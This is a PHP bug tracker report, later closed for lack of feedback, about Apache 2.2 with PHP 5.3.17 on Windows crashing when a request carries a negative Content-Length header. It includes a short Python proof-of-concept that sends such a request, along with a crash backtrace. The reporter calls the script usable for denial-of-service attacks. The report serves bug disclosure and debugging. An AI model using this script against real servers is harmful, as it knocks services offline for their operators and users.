Edit report at https://bugs.php.net/bug.php?id=63200&edit=1
ID: 63200
Updated by: php-bugs@lists.php.net
Reported by: chris at whyley dot com
Summary: Apache 2.2 crashes when PHP called with negative
Content-Length HTTP header
-Status: Feedback
+Status: No Feedback
Type: Bug
Package: Reproducible crash
Operating System: Windows Server 2003
PHP Version: 5.3.17
New Comment:
No feedback was provided. The bug is being suspended because
we assume that you are no longer experiencing the problem.
If this is not the case and you are able to provide the
information that was requested earlier, please do so and
change the status of the bug back to "Open". Thank you.
Previous Comments:
------------------------------------------------------------------------
[2012-10-05 10:26:01] chris at whyley dot com
I have not tested this issue under version 5.4 as my environment is setup for
5.3.17 - Are you able to recreate in 5.3.17 ?
It always crashes no matter what I have in index.php - in fact I can call any
page and cause the crash to happen.
------------------------------------------------------------------------
[2012-10-05 04:26:26] larue...@php.net
I can not reproduce this with 5.4, and from the backtrace, it seems crash in
another place.
so, is it related with your index.php? does it always crash no matter what the
index.php is?
------------------------------------------------------------------------
[2012-10-02 14:45:02] chris at whyley dot com
Description:
------------
Apache 2.2 with PHP 5.3.17 on Windows Server 2003 can be made to repeatably
crash
by doing the following:
(1) Configure your Apache server to use a custom error handling page for the
HTTP
413 error (Request entity too large) by inserting this line into your
httpd.conf:
ErrorDocument 413 /error/
(2) Run the Python test script detailed below to send an HTTP GET request to
the
server with a negative integer for the HTTP "Content-Length" header and with
the
"Accept-Encoding" header set to "gzip, deflate"
When this is run, Apache crashes with the following error:
[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length
[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status
3221225477 -- Restarting.
This issue is a particular problem in the wild where many modern browsers
aren't
capable of handling file uploads over 2GB in size - instead of posting an
accurate filesize for the Content-Length header they use a negative integer
instead, causing the Apache server running PHP to crash. For further
information
on this see http://www.motobit.com/help/scptutl/pa98.htm
The script could be used to perform DOS attacks on vulnerable systems.
Test script:
---------------
#!/usr/bin/python
import socket, sys
target = "10.211.55.3"
port = 80;
request = "GET / HTTP/1.1\n"
request += "Host: "+target+"\n"
request += "Accept-Encoding: gzip, deflate\n"
request += "Content-Length: -1\n\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((target, port))
except:
print "[-] Connection to %s:%s failed!" % (target, port)
sys.exit(0)
print "[+] Sending HTTP request. Check for crash on target."
s.send(request)
s.close()
Expected result:
----------------
Stable Apache, no crash.
Actual result:
--------------
Thread 2 - System ID 3008
Entry point msvcrt!_endthreadex+3a
Create time 10/2/2012 2:29:08 PM
Time spent in user mode 0 Days 0:0:0.0
Time spent in kernel mode 0 Days 0:0:0.15
Full Call Stack
Function Arg 1 Arg 2 Arg 3 Arg 4 Source
php5ts!zend_hash_index_find+17 016f3460 0000000d 018ee6c0
00000000 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_hash.c @ 985
php5ts!_zend_list_delete+27 0000000d 016b0150 029811c0 016b0150
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_list.c @ 55 + 27
php5ts!_php_stream_free+ae 029811c0 00000003 016b0150 029811c0
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\streams\streams.c @ 399 + a
php5ts!php_zend_stream_mmap_closer+1a 029811c0 016b0150 0290a4e0
007339f4 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1192 + 9
php5ts!zend_file_handle_dtor+2a 0290a4e8 016b0150 00000000
00000000 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_stream.c @ 316 + 8
php5ts!file_handle_dtor+14 0290a4e8 018ee828 018ee798 00000000
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_compile.c @ 174 + b
php5ts!zend_llist_del_element+71 016b1754 018ee828 007d9810
016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_llist.c @ 99 + 36
php5ts!zend_destroy_file_handle+26 018ee828 016b0150 016b0150
016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_language_scanner.l
@
242
php5ts!zend_execute_scripts+c4 00000002 016b0150 00000000
00000001 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend.c @ 1234
php5apache2_2!php_handler+64c 00fba200 006348e0 00fba200
00000000
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 671
+
13
libhttpd!ap_run_handler+25 00fba200 6eed3de0 00fba200 00634f68
libhttpd!ap_invoke_handler+b0 00000000 00fb8938 018ee8f8
6ff0ef68
libhttpd!ap_internal_redirect+37 00634f68 00fb8938 00eb6c50
0000019d
libhttpd!ap_die+1e8 00fb8938 00000000 00000001 00fba118
libhttpd!ap_http_header_filter+9f 00fb96f8 00fba118 00fba118
018ee974
libhttpd!ap_pass_brigade+52 00fb96f8 00fba118 00000000 00fba118
libhttpd!ap_content_length_filter+a9 00fb96e0 00eb6cb0 00fb96c8
018ee9e0
libhttpd!ap_pass_brigade+52 00fb96e0 00fba118 6fba4309 00fba118
libhttpd!ap_byterange_filter+474 00fb96c8 00fba118 00fba060
018eea1c
libhttpd!ap_pass_brigade+52 00fb96c8 00fba118 00eb6cb0 00fba118
mod_deflate+1352 00fba060 00fba118 00fba0c0 018eea58
libhttpd!ap_pass_brigade+52 00fba060 00fba118 00fba080 00fba190
mod_deflate+1aa1 00fc5a48 00fba1b0 00fba190 018eea84
libhttpd!ap_pass_brigade+52 00fc5a48 00fba190 00fb9938 00fba190
libhttpd!ap_old_write_filter+5b 00fba080 00fba190 00fba190
018eeab4
libhttpd!ap_pass_brigade+52 00fba080 00fba190 00fb9878 00fba138
libhttpd!ap_set_etag+b28 00fba138 00fb9938 0000019d 6ff37324
libhttpd!ap_set_etag+2bb 00fba190 00fb9e08 00000000 00000000
libhttpd!ap_get_brigade+24 00fb9938 00fb9e08 00000000 00000000
php5apache2_2!php_apache_sapi_read_post+3d 018eeb68 00000f9f
00000f9f
016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-
5.3.17\sapi\apache2handler\sapi_apache2.c @ 201 + 1a
php5ts!sapi_deactivate+6f 016b0150 016b0150 00000000 00fb8938
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\sapi.c @ 423 + d
php5ts!php_request_shutdown+3a6 00000000 00000004 00637170
00fb8938 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1670 + 6
php5apache2_2!php_handler+6b1 00fb8938 006348e0 00fb8938
00000000
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 682
libhttpd!ap_run_handler+25 00fb8938 00fb8938 00fb8938 00000000
libhttpd!ap_invoke_handler+b0 00000000 00fb7958 018eff38
6ff0adbc
libhttpd!ap_die+29e 00fb8938 00000000 006535b0 00fb7958
libhttpd!ap_get_request_note+1d0c 00fb7958 00fb7958 00fb7958
00000001
libhttpd!ap_run_process_connection+25 00fb7958 005c4488 018eff80
6ff1df6c
libhttpd!ap_process_connection+33 00fb7958 00eb49f8 7c911086
00eb0448
libhttpd!ap_regkey_value_remove+c7c 00fb7950 7c911086 7c9101db
00ea2120
msvcrt!_endthreadex+a9 00ea2120 7c911086 7c9101db 00ea2120
kernel32!BaseThreadStart+37 77c3a341 00ea2120 00000000 00000000
Exception Information
PHP5TS!ZEND_HASH_INDEX_FIND+17In
httpd__PID__3560__Date__10_02_2012__Time_02_29_32PM__453__Second_Chance_Exception
_C0000005.dmp the assembly instruction at php5ts!zend_hash_index_find+17 in
C:\Core\PHP-5317\php5ts.dll from The PHP Group has caused an access violation
exception (0xC0000005) when trying to read from memory location 0x0d3e2d2d on
thread 2
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=63200&edit=1
